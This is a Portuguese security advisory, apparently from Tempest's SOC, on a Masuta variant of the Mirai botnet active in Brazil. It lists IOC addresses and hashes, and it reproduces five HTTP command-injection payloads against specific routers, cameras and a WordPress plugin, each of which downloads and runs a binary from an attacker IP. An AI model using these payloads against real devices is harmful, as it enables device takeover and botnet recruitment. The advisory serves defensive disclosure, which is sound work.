Nova variante da botnet Mirai tem atividade detectada no Brasil

Botnet tenta explorar vulnerabilidades em roteadores e sistemas de monitoramento

A equipe de monitoramento da Tempest identificou uma nova variante da botnet Mirai (Masuta) com atividade detectada no Brasil.

Segundo o SOC, a botnet estaria realizando tentativas de exploração de cinco tipos de vulnerabilidades de execução e/ou injeção remota de código presentes em roteadores D-Link (modelo DSL-2750B) e Zyxel (modelo EMG2926), em sistemas de monitoramento NUUO (modelo NVRmini) e AirLink101 (modelo SkyIPCam1620W) e no plugin DZS-VideoGallery do WordPress.

Em junho, o SOC já havia identificado um aumento significativo nas tentativas de infecção pela botnet Satori (outra variante da Mirai) após a mesma ter passado por aprimoramentos, entre os quais estava a possibilidade de explorar uma vulnerabilidade de execução remota de comandos no roteador D-Link DSL-2750B, cujo exploit foi divulgado no dia 25 de maio, e que também é alvo da nova campanha.

A seguir estão os detalhes da nova campanha descoberta pelo time da Tempest (para acessar os links, copie e cole os endereços no seu navegador):

Vulnerabilidades

D-Link DSL-2750B

https://packetstormsecurity.com/files/135706/D-Link-DSL-2750B-Remote-Command-Execution.html

Payload: GET /login.cgi?cli=aa aa’;wget hxxp://178.128.11[.]199/qtx.mips -O -> /tmp/rz;chmod 777 /tmp/rz;/tmp/rz dlink’$ HTTP/1.1

Zyxel, EMG2926

https://www.exploit-db.com/exploits/41782/

Payload: GET | /cgi-bin/luci/expert/maintenance/diagnostic/nslookup?ostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca ; cd /tmp;wget hxxp://178.128.11[.]199/rvs -O /tmp/rz;chmod 777 /tmp/rz

NUUO NVRmini

https://cxsecurity.com/issue/WLB-2016080066

Payload: GET /cgi-bin/cgi_system?cmd=raid_setup&act=getsmartinfo&devname=|ping -n 0 localhost&rand=1452765315144;wget hxxp://178.128.11.199/qtx[.]mips -O /tmp/rz;chmod 777 /tmp/rz;/tmp/rz exploit HTTP/1.0

AirLink101 SkyIPCam1620W

https://www.coresecurity.com/advisories/airlink101-skyipcam1620w-os-command-injection

Payload: GET /maker/snwrite.cgi?mac=1234;wget hxxp://178.128.11[.]199/qtx.mips -O /tmp/rz;chmod 777 /tmp/rz;/tmp/rz exploit HTTP/1.0

WordPress Plugin DZS-VideoGallery

https://www.exploit-db.com/exploits/39250/

Payload: GET /wp-content/plugins/dzs-videogallery/img.php?webshot=1&src=hxxp://localhost/1.jpg$(wget$20) hxxp://178.128.11[.]199/qtx.mips -O /tmp/rz;chmod 777 /tmp/rz;/tmp/rz) HTTP/1.0 |

IOCs

Control Panel

178.128.11.199

Botnet

116.64.34.5

119.240.84.96

123.0.126.94

124.241.170.48

124.246.230.97

126.119.6.240

153.182.127.162

163.131.120.48

180.11.158.142

180.20.240.24

203.141.120.105

218.217.114.239

218.41.195.86

218.47.16.78

219.118.135.245

220.220.28.220

27.142.132.247

27.86.59.192

47.98.141.123

58.157.32.157

61.26.94.245

Hash MD5

f578982c9757a7e7c1353fe5f2be3039

fd6020b6ed9117ca1586f19e37f83d2b

b2f75a9864d1d8ecae967936faafc000

693c9e4558b01e2902dfcb4ebea3433c

0a4893676ddb3707a84192bdba818f27

ddfcf41deb922748b7522aafe598cf7d

b19dd00b0b1692af823494c6e4e977a0

8abc64503d7337ba02668de9302966d5

eac4091aa1562432e55b2b64f8cd8bed

ee0921422c29b12912c1ba8d73de3a0e

50d3fdbae83083b5cb1e269d0af3c9ce

964fa00c99856ce66fa86901adcc49b1

be92b623b9937fff7cf0f633c8cb1c59

e0972a185ba9576860d885a28be4f2a4

86dc9bb470ae01e3ca41e0c94d897629

91c8e3ee5303af9d8a63fcd7632b5c2b

16003c814898ad43e1d8bdc3ad963242

b21c5c1686e5cfc2a7e50dee921b6de5

7e3156908cb24b3fb54cf4eccfb515c2

Hash SHA256

1f32a929ed4657b31ac1b33241a637bc9b92f6a06aee7caca3b061fa4b4eb120
02c0d708a238d2c0cd191e967a78c86daff617d157a79566e60e941a5c9a537b
e55c0bb0ca20e38f01809c8e17f2c26a454ce8a2a45f2390fd847a438634f7ff
9dc10b44ac96cfe72340573672c929d6951909027368d0091d259c99db699128
a0b6017a7df17fa906af95f1d7c031174eb8f214e1b946744ea042ef43d69f2c
520a6f774b55540035e1d49983a8802fefc428c5d0db4695f9d3e9f50e807b4c
174585d2f988a5af0e7f76237618c631c21caa32b9e4c62805ae85a0ecccfb27
97afe6e343c8273426504787ecbd186c9b4785dfa71156fe9b038b918a17a616
92e42f10b866c7518523cdbea1160b773d52c0594b82057d20b8d9e8e1a784bd
09d3c4c715d3e7a8f87f086943f898e327d5a3dd381944848018fac838a331c8
8bbe5d1cae549aa49d3accd3e915900cb3ca7685aeb314252d41670529e5085a
c20a95cc27f67fe3f337fb5e939fdb6b84aee4ea5017dd97de86ce750ad4ca7e
5c6e78a669d058b4bcccaf805625844962161d59d28f59428022591a915b7b06
a373cd5446dab2f0069a55e9e9e892125785fefecece521c93ab9d932bec4a72
030133cb6584a3faba100b2849a20242cdfa1c6e1c349e2c87435dfb3234bfe1
fd59df7a00949006ae0fee607748187fdd902c77ba3c43736d8cfc2079b56671
096f3c7681a1ae931357ef27f41431f87db243cb6ffacaa0fdc4c684dc749077
6292913b6c84649e1e9bfdb0991108dff55468cafe223aace3dc81fb57fb9fe2
87503b709f984e2a91f91f0b5b3f286eade0a6df104c0423c380d378934f0253

Like what you read? Give Tempest Security a round of applause.

From a quick cheer to a standing ovation, clap to show how much you enjoyed this story.